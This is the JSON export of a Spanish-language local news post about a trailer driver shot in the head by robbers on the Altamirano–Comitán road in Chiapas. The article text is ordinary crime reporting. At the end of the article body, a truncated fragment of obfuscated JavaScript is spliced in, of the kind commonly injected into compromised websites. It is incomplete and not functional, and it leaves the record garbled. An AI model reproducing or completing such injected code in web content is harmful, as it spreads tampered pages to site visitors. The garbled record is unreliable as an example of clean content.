{"id":10974,"date":"2023-07-17T03:30:30","date_gmt":"2023-07-17T03:30:30","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=10974"},"modified":"2023-07-17T03:30:31","modified_gmt":"2023-07-17T03:30:31","slug":"balean-a-chofer-de-trailer-en-altamirano","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=10974","title":{"rendered":"Balean a chofer de tr\u00e1iler en Altamirano"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"904\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/07\/WhatsApp-Image-2023-07-16-at-2.56.36-PM-1024x904.jpeg\" alt=\"\" class=\"wp-image-10975\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/07\/WhatsApp-Image-2023-07-16-at-2.56.36-PM-1024x904.jpeg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/07\/WhatsApp-Image-2023-07-16-at-2.56.36-PM-300x265.jpeg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/07\/WhatsApp-Image-2023-07-16-at-2.56.36-PM-768x678.jpeg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/07\/WhatsApp-Image-2023-07-16-at-2.56.36-PM.jpeg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez\/Corresponsal<\/p>\n\n\n\n<p>16 de Julio del 2023. San Crist\u00f3bal de Las Casas.- Una persona result\u00f3 de gravedad tras ser baleado cuando circulaba en un tr\u00e1iler del tramo de Altamirano a Comit\u00e1n de Dom\u00ednguez la tarde-noche del pasado s\u00e1bado a la altura de una curva que identifican los lugare\u00f1os como El Caracol cerca de la comunidad La Mendoza, municipio de Altamirano.<\/p>\n\n\n\n<p>De acuerdo al testimonio de la esposa del conductor, mientras pasaban un tope, al bajar la velocidad, dos sujetos armados salieron de la maleza y enca\u00f1onaron al conductor, por lo que tuvo que parar totalmente la pesada unidad, pidi\u00e9ndole que les entregara el dinero, y al no tener y no dar nada, le dieron un balazo que le lleg\u00f3 en la cabeza.<\/p>\n\n\n\n<p>Tras el disparo, los sujetos huyeron y fue cuando la esposa del chofer, grit\u00f3 varias veces pidiendo ayuda, auxiliada por conductores de unidades del transporte que pasaban en el lugar, quienes estos pidieron el apoyo de Protecci\u00f3n Civil de la cabecera municipal de Altamirano.<\/p>\n\n\n\n<p>Los param\u00e9dicos trasladaron por la gravedad del chofer, al hospital de Las Culturas en San Crist\u00f3bal, quienes lo ingresaron de gravedad, ya que la bala no sali\u00f3 de la cabeza y ahora se debate entre la vida y la muerte.<\/p>\n\n\n\n<p>Es de mencionar que desde que se estableci\u00f3 la tranquilidad en el municipio de Altamirano, poco hacen rondines por la zona los el elementos de la Polic\u00eda Estatal y guardia Nacional, lo que ha convertido ese tramo carretero en muy inseguro, ya que desde meses atr\u00e1s han denunciado existe un grupo de asaltantes, sin que hasta el momento hayan sido detenidos.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/Corresponsal 16 de Julio del 2023. San Crist\u00f3bal de Las Casas.- Una persona result\u00f3 de gravedad tras ser baleado cuando circulaba en un tr\u00e1iler del tramo de Altamirano a Comit\u00e1n de Dom\u00ednguez la tarde-noche del pasado s\u00e1bado a la altura de una curva que identifican los lugare\u00f1os como El Caracol cerca de la comunidad &hellip;<\/p>\n","protected":false},"author":2,"featured_media":10975,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-10974","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/10974","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=10974"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/10974\/revisions"}],"predecessor-version":[{"id":10976,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/10974\/revisions\/10976"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/10975"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=10974"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=10974"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=10974"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}